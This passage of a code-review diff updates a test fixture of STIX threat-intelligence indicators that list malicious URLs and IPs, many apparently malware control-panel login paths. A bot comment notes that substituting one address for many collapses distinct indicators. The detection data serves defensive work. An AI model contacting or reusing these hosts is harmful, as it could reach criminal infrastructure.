CyberCrime","id":"indicator--4c8f8d86-da50-48bb-a41b-8a002561315a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-01T02:08:42.76Z","name":"mal_url: http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:08:42.76Z"} {"created":"2020-02-01T02:09:05.295Z","description":"TS ID: 55277443514; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3639e6da-8159-4dd6-b928-b8189c29159f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-01T02:09:05.295Z","name":"mal_url: http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:09:05.295Z"} {"created":"2020-02-01T02:09:13.398Z","description":"TS ID: 55277443134; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7d4bf98b-8fc2-427c-a08b-f432e43c1110","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-01T02:09:13.398Z","name":"mal_url: http://moonberry.pk/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://moonberry.pk/login']","type":"indicator","valid_from":"2020-02-01T02:09:13.398Z"} 
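Review bot: The substitution collapses several previously distinct indicators in this hunk into identical values — the Alibaba and Mail.Ru mal_ip records on the new side now both carry `"name":"mal_ip: 89.160.20.156"` with pattern `[ipv4-addr:value = '89.160.20.156']`, and `mal_url: http://89.160.20.156/login` already appears in this hunk and again twice in the `@@ -262,14 +262,14 @@` hunk, so the fixture no longer exercises the distinct-value handling (de-duplication, fingerprinting, per-indicator enrichment) that the original addresses covered. If the pipeline test's expected output is keyed on the indicator value rather than on `id`, it will need regenerating, and the collision is easy to miss because `id` still differs per record. Spreading the substitutions over more than one address from the permitted set would keep records that were distinct before the change distinct after it. The `description` fields still name the original hosting organizations (for example `Org: Alibaba`), which no longer correspond to the substituted address; that is acceptable for a fixture, but any assertion on ASN or organization enrichment must be taken from the enrichment output, not inferred from `description`.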
@@ -262,14 +262,14 @@ {"created":"2020-02-01T02:10:00.889Z","description":"TS ID: 55277443489; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--e409b749-d733-4b69-83cf-4df74ac8fd2b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:10:00.889Z","name":"mal_url: http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:10:00.889Z"} {"created":"2020-02-01T02:10:04.196Z","description":"TS ID: 55277443402; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--347a1f39-78c4-4f71-b125-decaba2489b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:10:04.196Z","name":"mal_url: http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:10:04.196Z"} {"created":"2020-02-01T02:10:04.234Z","description":"TS ID: 55277443231; iType: mal_url; State: active; Org: Fornex Hosting S.L.; Source: CyberCrime","id":"indicator--acd84a21-6112-4bbb-9132-fa50a9b7b07c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:10:04.234Z","name":"mal_url: http://nextbridge.info/god/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nextbridge.info/god/admin.php']","type":"indicator","valid_from":"2020-02-01T02:10:04.234Z"} -{"created":"2020-02-01T02:10:18.897Z","description":"TS ID: 55277442692; iType: mal_url; State: 
active; Source: CyberCrime","id":"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-01T02:10:18.897Z","name":"mal_url: http://45.86.65.210/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.86.65.210/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:10:18.897Z"} +{"created":"2020-02-01T02:10:18.897Z","description":"TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-01T02:10:18.897Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:10:18.897Z"} {"created":"2020-02-01T02:10:19.383Z","description":"TS ID: 55277443285; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--ca6a96b9-60e6-429f-9223-7009c1a5e164","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:10:19.383Z","name":"mal_url: http://corpcougar.com/collins/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/collins/32/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:10:19.383Z"} -{"created":"2020-02-01T02:10:19.417Z","description":"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: 
CyberCrime","id":"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-01T02:10:19.417Z","name":"mal_ip: 92.63.197.239","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '92.63.197.239']","type":"indicator","valid_from":"2020-02-01T02:10:19.417Z"} +{"created":"2020-02-01T02:10:19.417Z","description":"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-01T02:10:19.417Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-01T02:10:19.417Z"} {"created":"2020-02-01T02:10:39.062Z","description":"TS ID: 55277443225; iType: mal_url; State: active; Org: Avguro Technologies Ltd. 
Hosting service provider; Source: CyberCrime","id":"indicator--5a37e909-b130-4f49-b1d5-f4645a9d4c21","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-01T02:10:39.062Z","name":"mal_url: http://pom4ekk.myjino.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pom4ekk.myjino.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:10:39.062Z"} -{"created":"2020-02-01T02:10:42.316Z","description":"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-01T02:10:42.316Z","name":"mal_url: http://5.188.60.62/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.62/login']","type":"indicator","valid_from":"2020-02-01T02:10:42.316Z"} +{"created":"2020-02-01T02:10:42.316Z","description":"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-01T02:10:42.316Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-01T02:10:42.316Z"} {"created":"2020-02-01T02:11:07.132Z","description":"TS ID: 55277443508; iType: mal_url; State: active; Org: Best-Hoster Group Co. 
Ltd.; Source: CyberCrime","id":"indicator--d5f6e0de-d0bb-48f9-931d-5f4fd725a712","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:11:07.132Z","name":"mal_url: http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:11:07.132Z"} {"created":"2020-02-01T02:11:07.159Z","description":"TS ID: 55277443305; iType: mal_url; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--d2ef46a3-6df2-4cc9-bb15-886dc24d41e5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-01T02:11:07.159Z","name":"mal_url: http://betprognoz.pro/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://betprognoz.pro/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:11:07.159Z"} -{"created":"2020-02-01T02:11:33.332Z","description":"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:11:33.332Z","name":"mal_url: http://185.244.151.170/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.244.151.170/login']","type":"indicator","valid_from":"2020-02-01T02:11:33.332Z"} +{"created":"2020-02-01T02:11:33.332Z","description":"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: 
CyberCrime","id":"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:11:33.332Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-01T02:11:33.332Z"} {"created":"2020-02-01T02:11:40.48Z","description":"TS ID: 55277443247; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--ede31398-e157-401a-9362-127f5c5983ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:11:40.48Z","name":"mal_url: http://farzanatradings.com/fakedon/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farzanatradings.com/fakedon/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:11:40.48Z"} {"created":"2020-02-01T02:11:41.88Z","description":"TS ID: 55277443064; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--297cf29f-42ad-44ac-9f04-5156899d5ce9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:11:41.88Z","name":"mal_url: http://q74722vp.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://q74722vp.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:11:41.88Z"} {"created":"2020-02-02T01:57:18.343Z","description":"TS ID: 55280666668; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--194d8979-3fb6-4ebb-b7b1-d4758be6b32a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-02T01:57:18.343Z","name":"mal_url: 
http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T01:57:18.343Z"} 
@@ -287,46 +287,46 @@ {"created":"2020-02-02T01:58:54.099Z","description":"TS ID: 55280666701; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--0bb2320f-9a03-4375-ad2a-10b5d3c41b36","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-02T01:58:54.099Z","name":"mal_url: http://f0387404.xsph.ru/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387404.xsph.ru/']","type":"indicator","valid_from":"2020-02-02T01:58:54.099Z"} {"created":"2020-02-02T01:59:11.446Z","description":"TS ID: 55280666697; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--f6198f5d-4056-4b4f-8ab7-d9b82ec4878b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-02T01:59:11.446Z","name":"mal_url: http://j1040794.myjino.ru/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1040794.myjino.ru/']","type":"indicator","valid_from":"2020-02-02T01:59:11.446Z"} {"created":"2020-02-02T01:59:24.665Z","description":"TS ID: 55280666589; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--60d7cde7-6852-4295-8399-81b21cc74d7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-02T01:59:24.665Z","name":"mal_url: http://f0395171.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0395171.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T01:59:24.665Z"} -{"created":"2020-02-02T02:00:11.839Z","description":"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: 
CyberCrime","id":"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:00:11.839Z","name":"mal_url: http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php']","type":"indicator","valid_from":"2020-02-02T02:00:11.839Z"} +{"created":"2020-02-02T02:00:11.839Z","description":"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:00:11.839Z","name":"mal_url: http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php']","type":"indicator","valid_from":"2020-02-02T02:00:11.839Z"} {"created":"2020-02-02T02:00:15.667Z","description":"TS ID: 55280666662; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--f6bd5b3a-7b17-4b33-a487-1d47f9ffa62b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-02T02:00:15.667Z","name":"mal_url: http://nortonlilly.info/boss/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/boss/login.php']","type":"indicator","valid_from":"2020-02-02T02:00:15.667Z"} {"created":"2020-02-02T02:00:31.866Z","description":"TS ID: 55280666667; iType: mal_url; State: active; Org: Avguro Technologies Ltd. 
Hosting service provider; Source: CyberCrime","id":"indicator--bc1481fa-a858-4a87-9ef6-8844ace2dbed","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-02T02:00:31.866Z","name":"mal_url: http://ildar-mael-ru.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ildar-mael-ru.myjino.ru/login']","type":"indicator","valid_from":"2020-02-02T02:00:31.866Z"} {"created":"2020-02-02T02:00:31.895Z","description":"TS ID: 55280666659; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--e441cd63-5660-465f-a299-b035d8276ff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-02T02:00:31.895Z","name":"mal_url: http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T02:00:31.895Z"} -{"created":"2020-02-02T02:00:38.587Z","description":"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--f83c3853-4de3-4139-8076-a598265f453c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-02T02:00:38.587Z","name":"mal_ip: 85.117.234.217","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '85.117.234.217']","type":"indicator","valid_from":"2020-02-02T02:00:38.587Z"} +{"created":"2020-02-02T02:00:38.587Z","description":"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--f83c3853-4de3-4139-8076-a598265f453c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-02T02:00:38.587Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-02T02:00:38.587Z"} {"created":"2020-02-02T02:00:38.657Z","description":"TS ID: 55280666595; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--374e400c-0db7-4e0d-b533-5b6653178da0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-02T02:00:38.657Z","name":"mal_url: http://f0393257.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0393257.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T02:00:38.657Z"} {"created":"2020-02-02T02:00:44.275Z","description":"TS ID: 55280666609; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--6a115b32-72cb-4397-9550-28bd809ff522","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:00:44.275Z","name":"mal_url: http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T02:00:44.275Z"} -{"created":"2020-02-02T02:01:03.981Z","description":"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime","id":"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-02T02:01:03.981Z","name":"mal_ip: 46.17.175.204","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = 
'46.17.175.204']","type":"indicator","valid_from":"2020-02-02T02:01:03.981Z"} -{"created":"2020-02-02T02:01:09.238Z","description":"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:01:09.238Z","name":"mal_ip: 47.90.215.148","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.90.215.148']","type":"indicator","valid_from":"2020-02-02T02:01:09.238Z"} -{"created":"2020-02-03T01:56:22.888Z","description":"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-03T01:56:22.888Z","name":"mal_ip: 176.107.160.116","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.107.160.116']","type":"indicator","valid_from":"2020-02-03T01:56:22.888Z"} +{"created":"2020-02-02T02:01:03.981Z","description":"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime","id":"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-02T02:01:03.981Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-02T02:01:03.981Z"} +{"created":"2020-02-02T02:01:09.238Z","description":"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: 
CyberCrime","id":"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:01:09.238Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-02T02:01:09.238Z"} +{"created":"2020-02-03T01:56:22.888Z","description":"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-03T01:56:22.888Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-03T01:56:22.888Z"} {"created":"2020-02-03T01:56:30.815Z","description":"TS ID: 55283402093; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--16fe8840-e1d7-4e71-acd8-d727ed7baa09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-03T01:56:30.815Z","name":"mal_url: http://mine.kommanditgesel.icu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mine.kommanditgesel.icu/login']","type":"indicator","valid_from":"2020-02-03T01:56:30.815Z"} {"created":"2020-02-03T01:56:31.691Z","description":"TS ID: 55283402090; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--c091ca15-bd83-4318-b0f0-1c322baa7a7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-03T01:56:31.691Z","name":"mal_url: 
http://soapstampingmachines.com/slider/data1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://soapstampingmachines.com/slider/data1/panel/admin.php']","type":"indicator","valid_from":"2020-02-03T01:56:31.691Z"} {"created":"2020-02-03T01:56:34.945Z","description":"TS ID: 55283402094; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--d68559f0-f20c-40bb-ab62-c2f80c83c80f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-03T01:56:34.945Z","name":"mal_url: http://jino-stell-jino.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jino-stell-jino.myjino.ru/login']","type":"indicator","valid_from":"2020-02-03T01:56:34.945Z"} -{"created":"2020-02-03T01:57:32.61Z","description":"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-03T01:57:32.61Z","name":"mal_url: http://5.188.60.58/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.58/auth.php']","type":"indicator","valid_from":"2020-02-03T01:57:32.61Z"} -{"created":"2020-02-03T01:57:46.702Z","description":"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-03T01:57:46.702Z","name":"mal_ip: 92.63.197.191","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = 
'92.63.197.191']","type":"indicator","valid_from":"2020-02-03T01:57:46.702Z"} +{"created":"2020-02-03T01:57:32.61Z","description":"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-03T01:57:32.61Z","name":"mal_url: http://89.160.20.156/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/auth.php']","type":"indicator","valid_from":"2020-02-03T01:57:32.61Z"} +{"created":"2020-02-03T01:57:46.702Z","description":"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-03T01:57:46.702Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-03T01:57:46.702Z"} {"created":"2020-02-03T01:58:15.744Z","description":"TS ID: 55283402101; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--336d902d-e5d8-48c1-87be-c4f506274d34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-03T01:58:15.744Z","name":"mal_url: http://hypercleaner.su/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hypercleaner.su/auth.php']","type":"indicator","valid_from":"2020-02-03T01:58:15.744Z"} {"created":"2020-02-03T01:58:28.73Z","description":"TS ID: 55283402095; iType: mal_url; State: active; Source: 
CyberCrime","id":"indicator--cae5efb7-ff91-4a8d-bf28-21ffff0e4994","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-03T01:58:28.73Z","name":"mal_url: http://pnny.kommanditgesel.icu/news/plast/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pnny.kommanditgesel.icu/news/plast/admin.php']","type":"indicator","valid_from":"2020-02-03T01:58:28.73Z"} {"created":"2020-02-03T01:59:18.132Z","description":"TS ID: 55283402096; iType: mal_url; State: active; Org: PT Master Web Network; Source: CyberCrime","id":"indicator--1644ebf0-46d0-4dcc-8e04-3a58376cc625","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-03T01:59:18.132Z","name":"mal_url: http://pa-buol.go.id/wp/panelnew/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 